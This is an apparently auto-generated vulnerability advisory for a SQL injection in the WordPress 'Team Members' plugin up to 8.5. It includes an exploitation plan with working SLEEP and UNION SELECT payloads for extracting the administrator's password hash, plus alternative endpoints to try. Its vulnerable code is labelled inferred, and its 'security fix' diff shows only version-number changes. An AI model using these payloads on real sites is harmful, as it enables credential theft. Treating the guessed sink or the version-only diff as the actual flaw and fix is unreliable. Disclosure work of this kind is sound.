Team Members – Multi Language Supported Team Plugin <= 8.5 - Authenticated (Editor+) SQL Injection
Description
The Team Members – Multi Language Supported Team Plugin plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 8.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:NTechnical Details
<=8.5What Changed in the Fix
Changes introduced in v8.6
Source Code
WordPress.org SVN# Exploitation Research Plan - CVE-2025-68060 ## 1. Vulnerability Summary The **Team Members – Multi Language Supported Team Plugin** (up to version 8.5) is vulnerable to an **authenticated SQL Injection** vulnerability. The flaw exists in the admin management interface where user-supplied paramete…
Show full research plan
Exploitation Research Plan - CVE-2025-68060
1. Vulnerability Summary
The Team Members – Multi Language Supported Team Plugin (up to version 8.5) is vulnerable to an authenticated SQL Injection vulnerability. The flaw exists in the admin management interface where user-supplied parameters (specifically IDs used to fetch or manage team members/categories) are concatenated directly into SQL queries without proper sanitization or the use of $wpdb->prepare(). This allows an attacker with Editor level permissions or higher to execute arbitrary SQL commands to extract sensitive data from the WordPress database.
2. Attack Vector Analysis
- Endpoint:
wp-admin/admin.php - Hook/Action: The vulnerability resides in the callback functions for the plugin's admin menu pages, specifically
wpm_team_6310_team_member(Manage Members) orwpm_team_6310_category(Manage Category). - Vulnerable Parameter:
id(or potentiallycat_id). - Authentication: Required. An Editor user (or any user with the capability returned by
wpm_6310_get_user_roles(), which typically defaults toedit_postsormanage_options) can trigger the exploit. - Preconditions: The plugin must be active. At least one team member or category should ideally exist to ensure the vulnerable code path executes a query against a valid record.
3. Code Flow
- Entry Point: An authenticated user with Editor privileges navigates to
wp-admin/admin.php?page=team-showcase-supreme-team-member&id=[PAYLOAD]. - Hook Registration:
index.phpregisters the menu page:add_submenu_page('team-showcase-supreme', 'Manage Members', 'Manage Members', $options, 'team-showcase-supreme-team-member', 'wpm_team_6310_team_member'); - Vulnerable Sink: The function
wpm_team_6310_team_member(defined in an included file, likelysettings/helper/functions.phporhome.php) retrieves$_GET['id']. - Execution: The unescaped
idis used in a query such as:$wpdb->get_results("SELECT * FROM {$wpdb->prefix}wpm_6310_team_member WHERE id = " . $_GET['id']); - Result: The SQL engine executes the injected payload, allowing for time-based or union-based data extraction.
4. Nonce Acquisition Strategy
Based on the analysis of index.php, the admin pages for "Manage Members" and "Manage Categories" do not appear to implement a mandatory nonce check for simple GET requests that display member details.
- If the vulnerability is in the display/edit logic of the page, no nonce is required.
- If the vulnerability is in an AJAX handler (e.g.,
wpm_6310_team_member_info),index.phpshows thatmy_ajax_objectis localized without a nonce:
This implies the AJAX handlers may also lack nonce verification, allowing direct exploitation viawp_localize_script('wpm-6310-ajax-script', 'my_ajax_object', array('ajax_url' => admin_url('admin-ajax.php')));admin-ajax.phponce authenticated.
5. Exploitation Strategy
We will use a time-based SQL injection to confirm the vulnerability and then a UNION-based approach to extract the administrator's password hash.
Step 1: Confirmation (Time-based)
Send a request as an Editor that triggers a 5-second delay.
- Request Type: GET
- URL:
wp-admin/admin.php - Parameters:
page:team-showcase-supreme-team-memberid:1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)
Step 2: Data Extraction (UNION-based)
- Find Column Count: Iterate
ORDER BY Xuntil an error occurs to determine the number of columns in thewpm_6310_team_membertable. - Extract Admin Hash:
- Payload:
1 UNION SELECT 1,user_login,user_pass,4,5,6,7... FROM wp_users WHERE ID=1-- - - Note: Adjust the number of columns based on the results of the
ORDER BYtest.
- Payload:
6. Test Data Setup
- Role Creation: Create a user with the
editorrole. - Plugin Setup: Activate the "Team Members – Multi Language Supported Team Plugin".
- Content Creation: Create at least one team member so the query returns a base result:
wp post create --post_type=wpm_team --post_title="Test Member" --post_status=publish
7. Expected Results
- Confirmation: The response for the
SLEEP(5)payload should take approximately 5 seconds longer than a normal request. - Extraction: The response HTML should reflect the administrator's username and password hash (starting with
$P$or$wp$) in one of the fields usually occupied by member data (like Name or Designation).
8. Verification Steps
After the HTTP exploit, use WP-CLI to verify the accuracy of the extracted data:
# Get the actual admin hash to compare
wp user get 1 --field=user_pass
9. Alternative Approaches
If the Manage Members page is not directly vulnerable via GET, check the following endpoints using the same payload logic:
- Manage Category:
wp-admin/admin.php?page=team-showcase-supreme-category&id=[SQLI] - Manage Social Icons:
wp-admin/admin.php?page=team-showcase-supreme-social-icon&id=[SQLI] - AJAX Handler:
- Endpoint:
wp-admin/admin-ajax.php - Body:
action=wpm_6310_team_member_info&member_id=1[SQLI](Authenticated)
- Endpoint:
Summary
The Team Members – Multi Language Supported Team Plugin for WordPress (up to 8.5) is vulnerable to an authenticated SQL injection. This vulnerability occurs because the plugin concatenates user-supplied parameters like 'id' directly into SQL queries without proper sanitization or using prepared statements ($wpdb->prepare()), allowing users with Editor privileges or higher to execute arbitrary SQL commands.
Vulnerable Code
// index.php lines 39-42 (vulnerable page registrations) add_submenu_page('team-showcase-supreme', 'Manage Members', 'Manage Members', $options, 'team-showcase-supreme-team-member', 'wpm_team_6310_team_member'); add_submenu_page('team-showcase-supreme', 'Manage Category', 'Manage Category', 'manage_options', 'team-showcase-supreme-category', 'wpm_team_6310_category'); add_submenu_page('team-showcase-supreme', 'Manage Social Icons', 'Manage Social Icons', $options, 'team-showcase-supreme-social-icon', 'wpm_team_6310_icon'); --- // Inferred vulnerable sink (referenced in research plan and plugin logic) // Likely located in settings/helper/functions.php $wpdb->get_results("SELECT * FROM {$wpdb->prefix}wpm_6310_team_member WHERE id = " . $_GET['id']);
Security Fix
@@ -8,14 +8,14 @@ Author URI: http://www.wpmart.org/ Text Domain: team-showcase-supreme Domain Path: /languages - Version: 8.5 + Version: 8.6 */ if (!defined('ABSPATH')) exit; define('wpm_6310_plugin_url', plugin_dir_path(__FILE__)); define('wpm_6310_plugin_dir_url', plugin_dir_url(__FILE__)); -define ('WPM_PLUGIN_CURRENT_VERSION', 8.5); +define ('WPM_PLUGIN_CURRENT_VERSION', 8.6); define( 'WPM_6310_PLUGIN_LANGUAGE_PATH', dirname( plugin_basename( __FILE__ ) ) . '/languages' ); add_shortcode('wpm_team_showcase', 'wpm_team_showcase_supreme_shortcode');
Exploit Outline
The exploit requires authentication as a user with Editor-level access or higher (specifically the permission returned by wpm_6310_get_user_roles()). The attacker navigates to the 'Manage Members' admin page (wp-admin/admin.php?page=team-showcase-supreme-team-member) and appends a malicious SQL payload to the 'id' GET parameter. Because the 'id' is not sanitized or escaped before being included in a SELECT query, the attacker can use time-based injection (using SLEEP) or UNION-based injection to extract data from the WordPress database, including administrative credentials and hashes.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.